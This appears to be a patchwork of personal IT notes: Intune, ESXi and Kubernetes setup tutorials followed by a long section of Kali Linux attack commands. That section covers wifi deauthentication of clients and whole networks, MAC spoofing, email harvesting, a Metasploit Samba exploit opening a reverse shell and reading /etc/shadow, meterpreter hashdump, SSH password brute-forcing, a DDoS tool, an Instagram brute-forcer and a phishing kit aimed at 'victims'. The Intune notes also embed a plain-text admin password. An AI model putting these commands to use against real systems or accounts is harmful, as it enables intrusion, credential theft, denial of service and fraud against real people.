Enabling OneDrive Sync with Microsoft Intune

There are two main methods to enable OneDrive sync for users in your organization using Microsoft Intune:

Method 1: Deploying the OneDrive Sync App with Configuration Settings

This method involves creating a configuration profile in Intune that pushes the OneDrive sync app along with desired settings to user devices.

Here’s a step-by-step guide:

1. Sign in to the Microsoft Intune Manager admin center (https://intune.microsoft.com/).
2. Go to Devices > Configuration profiles > Create profile.
3. Select Platform: Choose Windows 10 and later.
4. Profile details: Enter a name and description for your profile.
5. Configuration settings: Click Add settings and search for OneDrive.
6. Configure OneDrive Settings: You’ll see various OneDrive settings you can configure, such as:
   • Silently sign in users to the OneDrive sync client with their Windows credentials (improves user experience)
   • Silently move known Windows folders to OneDrive (automatic cloud backup)
   • Specify the OneDrive folder location (custom location on the device)
   • Control OneDrive notifications (enable/disable specific notifications)
7. Scope tags and Assignments: Assign the profile to the desired user groups or devices.
8. Review + create: Review your configuration and create the profile.

Method 2: Using Intune to Manage Existing OneDrive Installations

If OneDrive is already pre-installed on user devices (common for Windows 10 and later), you can use Intune to manage its settings without deploying the entire app again.

Here’s how:

1. Follow steps 1-3 from Method 1.
2. Configuration settings: Click Add settings and search for OneDrive for Business. (Note the slight difference in naming convention)
3. Configure OneDrive Settings: You’ll have similar settings to configure as in Method 1, but specific options might differ slightly.
4. Follow steps 6-8 from Method 1 to complete profile creation and assignment.

Additional Notes:

• These methods require an Intune subscription and configuration of the Azure Active Directory (AAD) connection.
• Microsoft provides detailed documentation on configuring OneDrive settings with Intune: https://learn.microsoft.com/en-us/autopilot/
• Consider using Intune’s built-in reporting features to monitor OneDrive sync status across your devices.

By following these steps, you can leverage Microsoft Intune to centrally manage OneDrive sync for your users, ensuring consistent configuration and potentially improving user experience.

---

Go to Intune Admin center: https://intune.microsoft.com/#view/Microsoft_Intune_DeviceSettings/DevicesMenu/~/configuration

Home->Devices->Configuration

Create a new Policy

After Policy creation completion Go to Devices -> Windows-> Select the computer name -> Sync

Create a new Device configuration file

Navigate to intune -> Home->Devices->Manage Devices->configuration 

Create a new Policies

Platform: Windows 10 and later

Profile Type: Template 

Select: Custom

Go to configuration settings

Add new row

Name: Admin

OMA-URI: 

./Device/Vendor/MSFT/Accounts/Users/Admin/Password

Data Type: String

Value: Lost@12345

Add one more raw for adding local admin group

Name: Adding admin group

OMA-URI: ./Device/Vendor/MSFT/Accounts/Users/Admin/LocalUserGroup

Data type: Integer

Value: 2

Save and apply to the configuration file to Device groups

I have facing issue on my laptop have small storage space. So i can not take 128gb size iPhone backup on local drive. Here this step to take iPhone backup on external drive.

I have connected external hard-disc on laptop and make junction created on both side using power-shell.

Open Powers-Shell and go to iTunes default back location.

Path c:\user\admin\Apple\MobileSync>

cmd /c mklink /J “c:\Users\admin.GEMINIGROUPS\Apple\MobileSync\Backup” “F:\iPhone Backup\iTunes backup”

After entering this command, link will create on backup location.

Here below video will helpful

After successfully installation on ESXi server i would like to share my experience here.

Fixed error : nfs4lclient failed to load.

List of tools required for configure ESXi server on Dell Optiplex 3020

1. Vmware ESXi 5.5 iso image – Download from this link

2. Network card driver – Download from this link

3. ESXi customizer for rebuild iso image – Download from this link

4. Refus tool to make iso file bootable usb drive – Download from this link

if your facing error on ESXi customizer tool under window 10 machine. you need to change settings from ESXi-Customizer.cmd open with notepad then change line add REM on beginning.

REM if “!WinVer!” LSS “5.1” call :earlyFatal Unsupported Windows Version: !WinVer!. At least Windows XP is required & exit /b 1

Working network card VIB file can be download from this link

Download iso image from this link

Final bootable usb iso image can download from this link

Important notes – if your not getting ip address from dhcp server make sure change bios settings – boot from network first priority.

Installation of VLC player

#apt install vlc

#apt-get install gsettings-desktop-schemas

#apt-get update

Kali linux hidden file find

#ls -la

Show current directory

#pwd

Creating new file

#touch file.txt

Remove file

#rm file.txt

Creating new folder

#mkdir Data

Remove directory folder

#rm Data -r

Display current login user

#whoami

Executable access file

#chmod +x program.py

Fix access readonly error Editing sources.list

#sudo nano /etc/apt/sources.list

Today started to learn new latest container technology Kubernetes and How this works on cloud and local systems.

MiniKube is the smaller version kubernets on your localsystem. Installation: Download virutal box and install on windows 10 system.

Open power-shell and install required tools : chocolatey and minikube

PS:C:\minikube> iex ((New-Object System.Net.WebClient).DownloadString(‘https://chocolatey.org/install.ps1’))

PS:C:\minikube> choco install virtualbox -y

PS:C:\minikube> choco install minikube -y

PS:C:\minikube> choco install minikube –version 1.10.1 -y

PS:C:\minikube> minikube start –driver=virtualbox –alsologtostderr

PS:C:\minikube> minikube status

if you facing any issue on installation then delete minikube and install again

PS:C:\minikube> minikube delete ( repeat above step to install minikube)

PS:C:\minikube> minikube dashboard

http://127.0.0.1:55467/api/v1/namespaces/kubernetes-dashboard/services/http:kubernetes-dashboard:/proxy/#/pod?namespace=default

Pods

Pods are essential parts on kubernetes

PS:C:\minikube> kubectl get all (checking current running pods)

Below Sample Pod yaml format

---

apiVersion: v1
kind: Pod
metadata:
name: webapp

labels:
app: webapp
release: “0”
spec:
containers:

– name: webapp
image: richardchesterwood/k8s-fleetman-webapp-angular:release0

---

Save this on first-pod.yaml on same directory

PS:C:/minikube> kubectl apply -f first-pod.yaml (apply new pod created)

PS:C:/minikube> kubectl get all (check the pod running status)

Note: Pod not visible outside kubernetes cluster without expose ports.

PS:C:\minikube> minikube ip (finding IP address for minikube)

PS:C:\minikube> kubectl describe pod webapp (view details webapp pods)

PS:C:\minikube> kubectly exec webapp — ls (list of files inside pod)

Services

Services are stable on kubernets and its connected to pods.

Pods using labels / service using selector (match both key value pair)

ClusterIP — This service access internal only

NodePort — Expose port through the node to the outside access

kubernetes recommend Node-Port number greater than 30,000

Below sample service yaml format

---

apiVersion: v1
kind: Service
metadata:
name: fleetman-webapp

spec:
# This defines which pods are going to be represented by this Service
# The service becomes a network endpoint for either other services
# or maybe external users to connect to (eg browser)
selector:
app: webapp
release: “0”

ports:
– name: http
port: 80
nodePort: 30080

type: NodePort

---

Save this file as a “webapp-service.yaml” on the same directory

PS:C:\minikube> kubectl apply -f webapp-service.yaml (apply service to cluster whenever new update on code)

PS:C:\minikube> kubectl get all (check the status)

PS:C:\minikube> minikube ip (note it down ip address)

Access from browser url: http://192.168.99.102:30080/

We can add multiple pod on same yaml file using three dot separator(—)

Release: “0” – use this method to avoid down time loading images

PS:C:\minikube> kubectl describe svc fleeman-webapp (check the selector and release connected appropriate pod)

PS:C:\minikube> kubectl get pods (shows list of pods)

PS:C:\minikube> kubectl get po –show-labels (shows pods with labels)

PS:C:\minikube>kubectl get po –show-labels -l release=0 (with release)

PS:C:\minikube> kubectl apply -f . (apply all yaml file update)

PS:C:\minikube> kubectl delete po webapp-release (delete pod)

PS:C:\minikube> kubectl delete svc webapp-release (delete service)

PS:C:\minikube> kubectl delete po — (delete all pods)

ReplicaSets

Below sample ReplicaSets format

---

apiVersion: apps/v1
kind: ReplicaSet
metadata:
name: webapp
spec:
selector:
matchLabels:
app: webapp
replicas: 2
template: # template for the pods
metadata:
labels:
app: webapp
spec:
containers:
– name: webapp
image: richardchesterwood/k8s-fleetman-webapp-angular:release0-5

---

PS:C:\minikube> kubectl get all (list of running pods)

PS:C:\minikube> kubectl delete po –all (delete all pods)

PS:C:\minikube>kubectl describe replicaset webapp (information about replicaset)

PS:C:\minikube> kubectl describe rs webapp ( short code of replicaset)

PS:C:\minikube> kubectl delete rs webapp (Delete replicaset)

Depolyments

Deployment can be roll back to previous stage when failure happen.

Rolling update and Zero downtime using replicaset on this yaml file.

Below Sample Deployment yaml format

---

apiVersion: apps/v1
kind: Deployment
metadata:
name: webapp
spec:
# minReadySeconds: 30
selector:
matchLabels:
app: webapp
replicas: 2
template: # template for the pods
metadata:
labels:
app: webapp
spec:
containers:
– name: webapp
image: richardchesterwood/k8s-fleetman-webapp-angular:release0-5

---

PS:C:\minikube> kubectl rollout status deploy webapp (status for rollout)

PS:C:\minikube> kubectl rollout history deploy webapp (history of deployment)

PS:C:\minikube> kubectl rollout undo deploy webapp (revision return old version deployment)

Kubernetes can remember last 10 revision history.

Rollback feature use only in emergency stage.

Networking and Service Discovery

PS:C:\minikube> kubectl get namespace (shows namespace)

PS:C:\minikube> kubectl get pod (shows pods in the default namespace)

PS:C:\minikube> kubectl get pods -n kube-system (shows pods running on kube-system namespace)

PS:C:\minikube> kubectl get all -n kube-system (list of all services and pods running on kube-system pod)

PS:C:\minikube> kubectl describe svc kube-dns -n kube-system (service on namespace check)

Sample yaml file format mysql database connect with pods

---

apiVersion: v1
kind: Pod
metadata:
name: mysql
labels:
app: mysql
spec:
containers:name: mysql image: mysql:5 env: # Use secret in real life

name: MYSQL_ROOT_PASSWORD
value: password

name: MYSQL_DATABASE

value: fleetman

kind: Service
apiVersion: v1
metadata:
name: database
spec:
selector:
app: mysql
ports:

port: 3306
type: ClusterIP

---

How to login as root user

# sudo su

How to change wifi to monitor mode – wlan0mon

root# ifconfig wlan0 down

root# iwconfig wlan0 mode monitor

root# ifconfig wlan0 up

root# airmon-ng check kill

root# airmon-ng start wlan0

root# ifconfig wlan0mon up

How to disable monitor mode to managed mode

root# ifconfig wlan0mon down

root# iwconfig wlan0mon mode managed

root# ifconfig wlan0mon up

root# sudo airmon-ng stop wlan0mon

root# service network-manager start

Reboot the kali linux system

How to change MAC Address on Linux Machine

root# ifconfig

root# ifconfig wlan0 down

root# ifconfig wlan0 hw ether 00:11:22:33:44:55

root# ifconfig wlan0 up

How to disconnect or Deauthenticating device from wifi network using linux command

root# airodump-ng –band a wlan0mon (finding target wifi network MAC Address and channel note it)

root# airodump-ng mon0 (finding target wifi network MAC Address and channel)

root# airodump-ng – -channel 11 – -bssid 64:7C:34:A4:BB:B2 mon0 (finding list target machine mac address on this list)

For example wifi MAC address: 64:7C:34:A4:BB:B2 and Targe pc MAC address: 00:11:22:33:44:55

root# aireplay-ng –deauth 10000 -a 64:7C:34:A4:BB:B2 -c 00:11:22:33:44:55 mon0

How to stop Aireplay-ng running process command

root# killall aireplay-ng

root# jobs (finding list of running jobs and note on id number)

root# kill %1

How to disconnect all device from Wifi Network using linux command Aireplay-ng

root# airodump-ng wlan0mon (finding target wifi network MAC Address and channel)

for example Target access point MAC address:64:7C:34:A4:BB:B2

root# aireplay-ng – -deauth 1000000 -a 64:7C:34:A4:BB:B2 wlan0mon

If error come from different channel then do airodump-ng find correct channel to fix this error

root# airodump-ng – -bssid 64:7C:34:A4:BB:B2 – -channel 11 wlan0mon

root# aireplay-ng – -deauth 1000000 -a 64:7C:34:A4:BB:B2 wlan0mon

How to find hidden network SSID name

using airodump-ng will find list of network. After that deauthentication method to disconnect one of client machine. Then client machine will sent hidden network information to air. Using airodump-ng will capture that hidden network name.

Finding list of network using airdoump-ng

root# airodump-ng wlan0mon

list will find hidden network without ESSID name, take note it on mac address and Channel.

for example hidden network mac address:11:22:33:44:55:66 and channel 6

root# airodump-ng –bssid 11:22:33:44:55:66 –channel 6 wlan0mon

above code will display list client connected on hidden nework. keep run above session ,Don’t disconnect this process meanwhile separate window open and run deauthentication method remove client connected on hidden network.

For example client mac address: 55:44:33:22:11

root# aireplay-ng –deauth 4 -a 11:22:33:44:55:66 -c 55:44:33:22:11 wlan0mon

now will disconnect client from hidden network and SSID name show to airodump-ng screen.

How to check wifi wlan0 on monitor mode or managed mode

root# iwconfig

Find company and employee email address

root@kali:~# theHarvester -d geminigroup.co -l 500 -b google

Find sub domain on any website user Sublist3r

Download from : git clone https://github.com/aboul3la/Sublist3r.git

Sublist3r# python3 sublist3r.py -b -d testwebsite.com

root# sublist3r -d sukheshcstest.com

website for finding subdomain : https://crt.sh/

Finding website back-end technology details

root# whatweb sukheshcs.com

Use firefox extension: wappalyzer

Using Burp Suite software: Set manual network proxy on firefox : 127.0.0.1 port 8080 – use this proxy server for all protocols

open firefox go to webiste and download CA certificate: https://burp/

Import CA certificate on firefox – privacy&security – view certificate -Autorities session- import certificate

Burpsuite proxy tab – start intercept

Finding IP Address and mac address on local area network

root# netdiscover -r 192.168.1.0/24

Scan vulnerability on webpage

root# nikto -h http://google.com

Samba server SMB login on Kali

root# smbclient -L \\\192.168.1.80\\

Port scan method

root# masscan -pl-65535 –rate 192.168.57.134

root# nmap -T4 -p- 192.168.57.134

root# nmap -T4 -p 22,80,110,139,443,32768 -A 192.168.1.57.134

Port scan with Metasploit

root# msfconsole

root# search portscan

msf5 > search portscan

# Name Disclosure Date Rank Check Description

---

0 auxiliary/scanner/http/wordpress_pingback_access normal No WordPress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP “XMas” Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner

Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 4
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.57.134
rhosts => 192.168.57.134
msf5 auxiliary(scanner/portscan/syn) > set ports 1-65535
ports => 1-65535
msf5 auxiliary(scanner/portscan/syn) > run

Port scan with Nessus

Download nessus from : https://www.tenable.com/downloads/nessus?loginAttempted=true

root# dpkg -i Nessus-8.12.0-ubuntu910_amd64.deb

You can start Nessus Scanner by typing /bin/systemctl start nessusd.service

Then go to https://kali:8834/ to configure your scanner

root# /bin/systemctl start nessusd.service

start scan port on web based nessess tool

Search samba Exploit on Kali- trans2open

Target pc ip address: 192.168.136.129

root@kali:~# searchsploit samba 2.2

---

Exploit Title | Path

---

Samba 2.0.x/2.2 – Arbitrary File Creatio | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) – trans2open O | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 – ‘nttrans’ Remote B | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) – ‘trans2open’ Rem | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / | linux/local/23674.txt
Samba 2.2.8 (Linux x86) – ‘trans2open’ R | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) – ‘trans2open’ Rem | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) – ‘trans2ope | solaris_sparc/remote/16330.rb
Samba 2.2.8 – Brute Force Method Remote | linux/remote/55.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22468.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22469.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22470.c
Samba 2.2.x – ‘call_trans2open’ Remote B | unix/remote/22471.txt
Samba 2.2.x – ‘nttrans’ Remote Overflow | linux/remote/9936.rb
Samba 2.2.x – CIFS/9000 Server A.01.x Pa | unix/remote/22356.c
Samba 2.2.x – Remote Buffer Overflow | linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) – Remote Code | multiple/remote/10.c
Samba < 2.2.8 (Linux/BSD) – Remote Code | multiple/remote/10.c
Samba < 3.0.20 – Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) – Denial of Service | linux_x86/dos/36741.py

---

root@kali:~# msfconsole

msf5 > search trans2open

# Name Disclosure Date Rank Check Description

---

0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index, for example use 3 or use exploit/solaris/samba/trans2open

msf5 > use 1

msf5 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 139 yes The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.136.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Samba 2.2.x – Bruteforce

msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.136.129
rhosts => 192.168.136.129

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/ ( double Tab button press to show all options)
set payload linux/x86/adduser set payload linux/x86/shell/bind_ipv6_tcp
set payload linux/x86/chmod set payload linux/x86/shell/bind_ipv6_tcp_uuid
set payload linux/x86/exec set payload linux/x86/shell/bind_nonx_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp set payload linux/x86/shell/bind_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid set payload linux/x86/shell/bind_tcp_uuid
set payload linux/x86/meterpreter/bind_nonx_tcp set payload linux/x86/shell/reverse_ipv6_tcp
set payload linux/x86/meterpreter/bind_tcp set payload linux/x86/shell/reverse_nonx_tcp
set payload linux/x86/meterpreter/bind_tcp_uuid set payload linux/x86/shell/reverse_tcp
set payload linux/x86/meterpreter/reverse_ipv6_tcp set payload linux/x86/shell/reverse_tcp_uuid
set payload linux/x86/meterpreter/reverse_nonx_tcp set payload linux/x86/shell_bind_ipv6_tcp
set payload linux/x86/meterpreter/reverse_tcp set payload linux/x86/shell_bind_tcp
set payload linux/x86/meterpreter/reverse_tcp_uuid set payload linux/x86/shell_bind_tcp_random_port
set payload linux/x86/metsvc_bind_tcp set payload linux/x86/shell_reverse_tcp
set payload linux/x86/metsvc_reverse_tcp set payload linux/x86/shell_reverse_tcp_ipv6
set payload linux/x86/read_file

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp

payload => linux/x86/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run

cat /etc/passwd

cat /etc/shadow

Finding wordlist location on Kali linux

root# .. /usr/share/wordlists/metasploit/ (double tab press)

root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.136.129:22 -t 4 -V

root# msfconsole
msf5> search ssh
msf5> use auxiliary/scanner/ssh/ssh_login
msf5> options
msf5> set username root
msf5> set pass_file /usr/share/wordlists/metasploit/unix_passwords.tx
msf5> set rhosts 192.168.136.129
msf5> set threads 10
msf5> set verbose true
msf5> run

nmap -A -T4 -p- 10.10.10.190

nmap -sC -sV -p$ports 10.10.10.190
ports=$(nmap -p- –min-rate=1000 -T4 10.10.10.190 | grep ^[0-9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$//)

meterpreter> getuid
meterpreter> sysinfor
metepreter> hashdump
metepreter > shell

> smbclient -N -L \\\\192.168.136.129\\backup$
> dir
> get filename

root# dirbuster

open OWASP Dirbuster

target url: 10.10.10.20

select file list: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

———————————————————————————–

DDOS attack – Hammer tool

root#git clone https://github.com/cyweb/hammer.git

cd hammer

python3 hammer.py -s 192.168.1.126 -p 80 -t 135

---

Instagram Bootforce with password list-

root#git clone https://github.com/Bitwise-01/Instagram-.git

root# cd Instagram-/

root# python3 instagram.py lockdownscs /root/Desktop/wordlist.txt -m 0

---

Phishing attack with kali linux

root# git clone https://github.com/htr-tech/zphisher.git

cd zphisher

root# ./zphisher.sh

List of method shows and share url to the vitms.

---